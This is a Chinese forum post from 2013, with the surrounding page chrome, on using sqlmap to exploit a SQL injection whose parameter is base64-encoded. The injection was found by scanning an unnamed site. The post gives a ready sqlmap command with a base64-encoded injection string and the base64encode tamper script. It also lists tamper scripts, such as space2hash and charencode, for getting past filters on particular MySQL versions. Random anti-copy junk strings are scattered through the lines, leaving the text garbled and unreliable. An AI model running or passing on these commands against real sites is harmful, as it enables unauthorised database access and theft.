找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2284|回复: 0
打印 上一主题 下一主题

SQlMap Tamper注入Base64编码注入点

[复制链接]
跳转到指定楼层
楼主
发表于 2013-11-23 15:50:45 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
WVS扫某站就出来一个SQL Injection,参数还是base64编码的,手工注入麻烦一步,用sqlmap怎么自动注射呢?
; v& n8 X- n! x( a) w6 u8 m! p, k( n; P: E" c) j
sqlmap的tamper里有个base64encode.py/ x2 F" G* R0 u6 J% I1 R/ S

3 }& t0 M+ c# v( J- @1 Q: q使用如下
* o3 I2 ~4 v, `" g' g# Z  M1 s# l. q7 N
sqlmap -u http://ha.cker.in/index.php?tel=LTEnIG9yICc4OCc9Jzg5 --tamper base64encode.py –dbs
# }1 v  s) S- Z$ J: {7 h) e. r$ Y$ g& L/ C( b* i- j

7 n) V5 s3 b1 F3 T0 Bsqlmap拥有很多功能强力的插件,插件的使用方法: -- tamper “插件名称”( i2 \) t) R6 f" p3 [9 g6 K

0 n( F' }: B) Y其中常用到的bypass脚本绕过SQLMAP主要两个脚本:' Y, Q, m- J& K9 a- V
6 S7 N/ v  W" }* j# ~: C4 q4 z
space2hash.py ,对于MYSQL数据库 4.0, 5.0注入9 Z: @; i# L/ u+ O1 K
space2morehash.py ,对于MYSQL数据库 >= 5.1.13 和 MySQL 5.1.41 注入
; |, `" v( ?2 Z- ^5 y! Q首先确定目标数据库版本,然后选择相应的脚本。  \7 Q% q4 H0 t* k
-v 3 --batch --tamper "space2hash.py"- V" K! @  O3 a  O  H2 W- ^
3 y1 J- u3 v9 j9 \
还有其他一些插件:! K" M+ v; M; k2 u' u
encodes编码 ——charencode.py' b" P  @! b. V6 A
base64编码 —— base64encode.py- w' W9 n8 I6 |# K! D' q
替换空格和关键字 —— halfversionedmorekeywords.py0 L8 r( a. @3 @" y& u1 d

: E# ~; ^' S7 m7 k1 I! s
: ?& w5 ]: @  M. I5 ?' G; N% D; s+ K% a7 N

6 I3 ~3 C! h& C5 Q& Q* J  d
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表